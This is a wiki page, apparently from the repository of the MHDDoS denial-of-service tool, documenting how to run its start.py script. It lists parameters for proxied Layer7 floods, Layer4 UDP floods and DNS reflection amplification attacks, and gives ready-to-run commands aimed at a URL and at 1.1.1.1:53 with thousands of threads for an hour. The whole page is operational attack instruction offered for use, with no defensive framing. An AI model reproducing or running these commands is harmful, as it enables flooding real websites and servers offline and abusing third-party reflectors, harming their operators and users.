Skip to content

Usage of script

SudoLite edited this page Jul 26, 2022 · 9 revisions

Parameters

  • Layer7:

    python3 start.py <1=method> <2=url> <3=socks_type> <4=threads> <5=proxylist> <6=rpc> <7=duration> <8=debug=optional>

    • 1: Method (type of attack)
    • 2: Target URL or IP Address
    • 3: Proxy Version (Proxy Usage)
    • 4: Proxy File (Proxy File Format)
    • 5: Number of threads to use (Multi Threading)
    • 6: RPC (Requests pre connection)
    • 7: Duration (Time to finish attack in seconds)
    • 8: Debug Mode (Optional)
  • Layer4 Normal:

    python3 start.py <1=method> <2=ip:port> <3=threads> <4=duration> <5=debug=optional>

    • 1: Method (type of attack)
    • 2: Target URL or IP Address
    • 3: Number of threads to use (Multi Threading)
    • 4: Duration (Time to finish attack in seconds)
    • 5: Debug Mode (Optional - What is debug mode)
  • Layer4 Proxied:

    python3 start.py <1=method> <2=ip:port> <3=threads> <4=duration> <5=socks_type> <6=proxylist> <7=debug=optional>

    • 1: Method (type of attack)
    • 2: Target URL or IP Address
    • 3: Number of threads to use (Multi Threading)
    • 4: Duration (Time to finish attack in seconds)
    • 5: Proxy Version (Proxy Usage)
    • 6: Proxy File (Proxy File Format)
    • 7: Debug Mode (Optional)
  • Layer4 Amplification:

    python3 MHDDoS/start.py <1=method> <2=ip:port> <3=threads> <4=duration> <5=refelector file> <6=debug=optional>

    • 1: Method (type of attack)
    • 2: Target URL or IP Address
    • 3: Number of threads to use (Multi Threading)
    • 4: Duration (Time to finish attack in seconds)
    • 5: Reflectors File (Reflectors File)
    • 6: Debug Mode (Optional)

Examples

  • Layer7 (Website):
# Running bypass attack from 101 threads, 
# with socks 5, 100 requests per proxy (connection), for 3600 seconds  
python start.py bypass https://example.com 5 101 socks5.txt 100 3600
# Running bomb attack from 50 threads (be careful must be < 300)
# with all proxies (0), 100 requests per proxy (connection), for 3600 seconds
python start.py bomb https://example.com 0 50 proxy.txt 100 3600
  • Layer4 (Server/Home):
# Running udp attack from 1 threads, for 3600 seconds  
python start.py udp 1.1.1.1:53 1 3600
# Running dns attack from 100 threads, for 3600 seconds  
# with reflector servers from dns.txt, for 3600 seconds  
python start.py dns 1.1.1.1:53 100 3600 dns.txt
# Running minecraft attack from 1000 threads
# with socks 5, for 3600 seconds  
python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt
  • Debug Mode (Log Attack status):
python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true
python start.py udp 1.1.1.1:53 1 100 true
python start.py dns 1.1.1.1:53 1 100 dns.txt true
python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true
  • Tools/Help:
python start.py tools
python start.py help
Clone this wiki locally